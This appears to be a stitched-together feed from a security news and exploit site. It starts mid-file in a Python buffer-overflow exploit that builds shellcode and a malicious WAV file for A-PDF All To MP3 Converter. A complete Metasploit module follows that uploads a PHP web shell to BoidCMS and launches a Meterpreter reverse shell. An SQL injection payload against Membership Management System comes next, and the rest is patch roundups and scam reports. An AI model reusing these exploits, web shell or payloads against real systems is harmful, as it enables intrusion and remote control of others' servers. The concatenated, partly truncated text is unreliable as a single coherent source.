b"\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9"real_shellcode += b"\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65"real_shellcode += b"\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01"real_shellcode += b"\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68"real_shellcode += b"\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68"real_shellcode += b"\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68"real_shellcode += b"\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57"real_shellcode += b"\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c"real_shellcode += b"\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78"real_shellcode += b"\x69\x74\x54\x53\xff\xd6\x57\xff\xd0"#######################  CONSTRUCT  ###########################SIZE = 500start_of_padding = b"A" * (SIZE-len(EXE)-len(shellcode))start_of_padding += shellcodestart_of_padding += EXESIZE = 1500RET_NOP_TO_ROP = b"A" * 0x70 + struct.pack("I", 0x1003c6aa) * 10 # RET#INT = struct.pack("I", 0x1000f2b3) + b"BBBB" # 0x1000f2b3: int3  ; pop esi ; ret  ;  (1 found)INT = struct.pack("I", 0x1003c6aa)*2rest_of_payload = RET_NOP_TO_ROP + INT + ROP # 160 + 14*4 + 172rest_of_payload += b"\x90" * 100rest_of_payload += real_shellcoderest_of_payload += b"\x90" * (SIZE-len(rest_of_payload))payload = junk + SEH + start_of_padding + rest_of_payloadREST = b"\x44" * (size-len(payload))payload += RESTfile = open("1.wav", "wb")file.write(payload)file.close()

A-PDF All To MP3 Converter 2.0.0 Overflow

This Metasploit module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS versions 2.0.0 and below. BoidCMS allows the authenticated upload of a php file as media if the file has the GIF header, even if the file is a php file.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework###class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'BoidCMS Command Injection',        'Description' => %q{          This module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS version 2.0.0          and below.  BoidCMS allows the authenticated upload of a php file as media if the file has          the GIF header, even if the file is a php file.        },        'License' => MSF_LICENSE,        'Author' => [          '1337kid',    # Discovery          'bwatters-r7' # Metasploit Module        ],        'References' => [          [ 'CVE', '2023-38836' ],          [ 'URL', 'https://github.com/1337kid/CVE-2023-38836']        ],        'Privileged' => false,        'Arch' => ARCH_CMD,        'Targets' => [          [            'nix Command',            {              'Platform' => ['linux', 'unix', 'python'],              'DefaultOptions' => {                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',                'FETCH_COMMAND' => 'WGET',                'FETCH_WRITABLE_DIR' => '/tmp'              }            }          ],          [            'Windows Command',            {              'Platform' => ['windows', 'python'],              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter_reverse_tcp',                'FETCH_WRITABLE_DIR' => '%TEMP%',                'FETCH_COMMAND' => 'CURL'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-07-13',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'The path', '']),      OptString.new('CMS_USERNAME', [true, 'Username', 'admin']),      OptString.new('CMS_PASSWORD', [true, 'Password', 'password']),      OptString.new('PHP_FILENAME', [true, 'The name for the php file to upload', "#{Rex::Text.rand_text_alphanumeric(5..11)}.php"])    ])    @token = nil    @shell_filename = nil  end  def check    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'keep_cookies' => true,      'method' => 'GET'    )    if res && res.code == 200      title = res.get_html_document.xpath('//title').first.to_s      return Exploit::CheckCode::Detected('Detected BoidCMS, but the version is unknown.') if title.include?('BoidCMS')    end    return Exploit::CheckCode::Safe('Unable to retrieve BoidCMS title page')  end  def extract_token(res)    token = nil    if res && res.code == 200      token = res.get_html_document.xpath("//input[@name='token']/@value").first    end    token  end  def cms_token    # initial login    return @token unless @token.nil?    vprint_status('Getting Token')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'keep_cookies' => true,      'method' => 'GET'    )    @token = extract_token(res)  end  def cms_login?(login_token)    vprint_status('Logging into CMS')    cms_password = datastore['CMS_PASSWORD']    cms_username = datastore['CMS_USERNAME']    vars_form_data =      [        {          'name' => 'username',          'data' => cms_username        },        {          'name' => 'password',          'data' => cms_password        },        {          'name' => 'login',          'data' => 'Login'        },        {          'name' => 'token',          'data' => login_token.to_s        }      ]    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'method' => 'POST',      'keep_cookies' => true,      'vars_form_data' => vars_form_data    )    res && res.code == 302  end  def upload_php?(login_token, shell_filename)    vprint_status("Uploading PHP file #{shell_filename}")    vars_form_data =      [        {          'name' => 'file',          'data' => 'GIF89a;\n<?php system($_GET["cmd"]) ?>',          'filename' => shell_filename        },        {          'name' => 'token',          'data' => login_token.to_s        },        {          'name' => 'upload',          'data' => 'Upload'        }      ]    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'method' => 'POST',      'keep_cookies' => true,      'vars_get' => {        'page' => 'media'      },      'vars_form_data' => vars_form_data    )    res && res.code == 302  end  def launch_payload(shell_filename, payload_cmd)    # send the command to the php page    vprint_status('launching Payload')    send_request_cgi(      'uri' => normalize_uri(target_uri.path, "/media/#{shell_filename}"),      'method' => 'GET',      'keep_cookies' => true,      'vars_get' =>        {          'cmd' => payload_cmd        }    )  end  def exploit    @shell_filename = datastore['PHP_FILENAME']    login_token = cms_token    fail_with(Failure::UnexpectedReply, 'Failed to retrieve token for login') if login_token.nil?    fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login?(login_token)    if upload_php?(login_token, @shell_filename)      register_file_for_cleanup @shell_filename      launch_payload(@shell_filename, payload.encoded)    else      fail_with(Failure::UnexpectedReply, 'Failed to upload php files')    end  endend

BoidCMS 2.0.0 Command Injection

Membership Management System version 1.0 suffers from a remote SQL injection vulnerability.

    - Title: Membership Management System - SQL injection- Application: Hospital Management System- Date: 01.03.2024- Bugs: SQL injection- Exploit Author: SoSPiro- Vendor Homepage: https://codeastro.com/author/nbadmin/- Software Link: https://codeastro.com/membership-management-system-in-php-with-source-code/- Version: 1.0- Tested on: Windows 10 64 bit Wampserver### Vulnerability Description:The provided payload in the POST request indicates a potential SQL injection vulnerability. Specifically, the manipulation within the email and password parameters suggests an attempt to influence the SQL query directly, presenting a risk for exploiting security vulnerabilities.### SQL Injection:This manipulated submission aims to affect the SQL query by incorporating user input. For instance, the use of **sleep(5)** introduces a time-delay technique, indicative of a potential resource-consuming attack vector by malevolent actors.### Proof of Concept (PoC):Below is an example payload illustrating the SQL injection vulnerability:```email=test@123.asd' + (SELECT * FROM (SELECT (SLEEP(5)))a) +'&password=admin' or '1'='1'&login=```In this example, the **sleep(5)** function is employed to induce a time delay, followed by the use of or **'1'='1'** in the password control section, aiming to always evaluate as true.- Request Response[PoC FoTo](https://gcdnb.pbrd.co/images/9k8xy4YRomp3.png?o=1)### Vulnerable Code Section:```php$email = $_POST['email'];$password = $_POST['password'];$hashed_password = md5($password);$sql = "SELECT * FROM users WHERE email = '$email' AND password = '$hashed_password'";```The provided PHP code section exacerbates the SQL injection risk by directly incorporating user input into the SQL query. To mitigate this vulnerability, the use of parameterized queries or prepared statements is recommended.## Reproduce: https://sospiro014.github.io/Membership-Management-System-SQL-injection

Membership Management System 1.0 SQL Injection

Plus: Mozilla patches 12 flaws in Firefox, Zoom fixes seven vulnerabilities, and more critical updates from February.

CVE-2024-1553 and CVE-2024-1557 are memory-safety bugs rated as having a high severity. “Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code,” Mozilla researchers said.

Zoom

Video conferencing giant Zoom has issued fixes for seven flaws in its software, one of which has a CVSS score of 9.6. CVE-2024-24691 is an improper-input-validation bug in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows. If exploited, the issue may allow an unauthenticated attacker to escalate their privileges via network access, Zoom said in a security bulletin.

Another notable flaw is CVE-2024-24697, an untrusted-search-path issue in some Zoom 32 bit Windows clients that could allow an authenticated user with local access to escalate their privileges.

Ivanti

In January, Ivanti warned that attackers were targeting two unpatched vulnerabilities in its Connect Secure and Policy Secure products, tracked as CVE-2023-46805 and CVE-2024-21887. With a CVSS score of 8.2 the first authentication-bypass vulnerability in the web component of Ivanti Connect Secure and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.

With a CVSS score of 9.1, the second command injection vulnerability in web components of Ivanti Connect Secure and Ivanti Policy Secure allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. This vulnerability can be exploited over the internet.

At the end of the month, the firm alerted companies to another two serious flaws, one of which was being exploited in attacks. The exploited issue is a server-side request forgery bug in the SAML component tracked as CVE-2024-21893. Meanwhile, CVE-2024-21888 is a privilege-escalation vulnerability.

Patches were available by February 1, but the issues were deemed so serious that the US Cybersecurity and Infrastructure Security Agency (CISA) advised disconnecting all Ivanti products by February 2.

On February 8, Ivanti released a patch for yet another issue tracked as CVE-2024-22024, which prompted another CISA warning.

Fortinet

Fortinet has issued a patch for a critical issue with a CVSS score of 9.6, which it says is already being used in attacks. Tracked as CVE-2024-21762, the code-execution flaw impacts FortiOS versions 6.0, 6.2, 6.4, 7.0, 7.2 and 7.4. The out-of-bounds write vulnerability can be used for arbitrary code execution using specially crafted HTTP requests, Fortinet said.

It came just days after the firm released a patch for two issues in its FortiSIEM products, CVE-2024-23108 and CVE-2024-23109, rated as critical with a CVSS score of 9.7. The flaw in FortiSIEM Supervisor could allow a remote unauthenticated attacker to execute unauthorized commands via crafted API requests, Fortinet said in an advisory.

Cisco

Cisco has listed multiple vulnerabilities in its Expressway Series that could allow an unauthenticated, remote attacker to conduct cross-site request forgery attacks.

Tracked as CVE-2024-20252 and CVE-2024-20254, two vulnerabilities in the API of Cisco Expressway Series devices have been given a CVSS score of 9.6. “An attacker could exploit these vulnerabilities by persuading a user of the API to follow a crafted link,” Cisco said. “A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user.”

SAP

Enterprise software firm SAP has released 13 security updates as part of its SAP Security Patch Day. CVE-2024-22131 is a code-injection vulnerability in SAP ABA with a CVSS score of 9.1.

CVE-2024-22126 is a cross-site scripting vulnerability in NetWeaver AS Java listed as having a high impact, with a CVSS score of 8.8. “Incoming URL parameters are insufficiently validated and improperly encoded before including them into redirect URLs,” security firm Onapsis said. “This can result in a cross-site scripting vulnerability, leading to a high impact on confidentiality and mild impact on integrity and availability.”

Here Are the Google and Microsoft Security Updates You Need Right Now

By Deeba Ahmed
The scammers creates fake investment platforms using popular companies like Tesla, Meta, and Imperial Oil and lures unsuspecting users into depositing funds.
This is a post from HackRead.com Read the original post: Savvy Seahorse Using Fake ChatGPT, Facebook Ads in DNS Investment Scam

Infoblox cybersecurity researchers are warning users about a fraudulent scheme launched by a DNS threat actor Savvy Seahorse, which uses Facebook advertisements to trick users into fraudulent investment platforms and transfers deposits to Russian-state-owned banks.

California-based IT automation and security company Infoblox has discovered a relatively new DNS threat actor called “Savvy Seahorse.” According to the company’s report, the actor creates fake investment platforms using popular icons like Tesla, Meta, and Imperial Oil and lures unsuspecting users into depositing funds. 

Savvy Seahorse prefers using Facebook ads to trick users into trusting fake investment platforms and transfers deposits to Russian-state-owned banks. Savvy Seahorse employs advanced techniques like fake ChatGPT and WhatsApp bots to lure users into high-return investment scams, which are the costliest category of threat reported to the FBI’s Internet Crime Complaint Center.

ChatGPT and WhatsApp bots engage users through automated responses for high-return investment opportunities. These campaigns target users in various countries, including Russian, Polish, Italian, German, Czech, Turkish, French, Spanish, and English speakers but interestingly users in Ukraine are protected. 

Through DNS canonical name (CNAME) records, the actor creates a traffic distribution system (TDS) for conducting sophisticated financial scams, controlling access to content and updating the IP addresses of malicious campaigns. This also helps them evade detection by the security industry. It is worth noting that Savvy Seahorse, active since 2021, is the first publicly reported threat actor abusing DNS CNAME records for sophisticated scam campaigns.

In a blog post, Infoblox researchers have identified several red flags associated with the Savvy Seahorse scam. These include short-lived campaigns (active for only 5-10 days), using a phased deployment system, frequent changes in IP addresses (to complicate/block tracking of malicious infrastructure), and the use of wildcard DNS entries.

These entries entail creating numerous subdomains, potentially confusing passive DNS analysis. These characteristics make it difficult to track and block malicious infrastructure. Victims’ data is sent to a secondary HTTP-based TDS server for validation and geofencing.

Around 4.2k base domains with CNAME records are used by Savvy Seahorse to host campaigns, Infoblox researchers confirmed. The attackers create subdomains for each SLD using a domain generation algorithm, using pseudo-random hostnames. Registration forms are used to gather victim information, and after validating it, they are redirected to the fake trading platform. The actor monitors users to prevent security threats.

The scam poses potential risks to individuals, including financial loss, data theft, and malware infection. Users who invest in the fake platform may lose their funds, while the scammers may steal personal and financial information.

Therefore, consumers must be vigilant when trusting unverified sources for making deposits. Remember that the US cumulatively lost over $4.6 billion in 2023 over investment scams.

1.  **WhatsApp Pink is malware spreading through group chats**
2.  **Thousands of Dark Web Posts Expose ChatGPT Abuse Plans**
3.  **China Arrests 4 Who Weaponized ChatGPT for Ransomware Attacks**
4.  **Fake Telegram, WhatsApp clones aim at crypto on Android, Windows**
5.  **SpyNote Android Spyware Poses as Legit Crypto Wallets, Steals Funds**

Savvy Seahorse Using Fake ChatGPT, Facebook Ads in DNS Investment Scam

The notorious Lazarus Group actors exploited a recently patched privilege escalation flaw in the Windows Kernel as a zero-day to obtain kernel-level access and disable security software on compromised hosts.
The vulnerability in question is CVE-2024-21338 (CVSS score: 7.8), which can permit an attacker to gain SYSTEM privileges. It was resolved by Microsoft earlier this month as part

Tag

#windows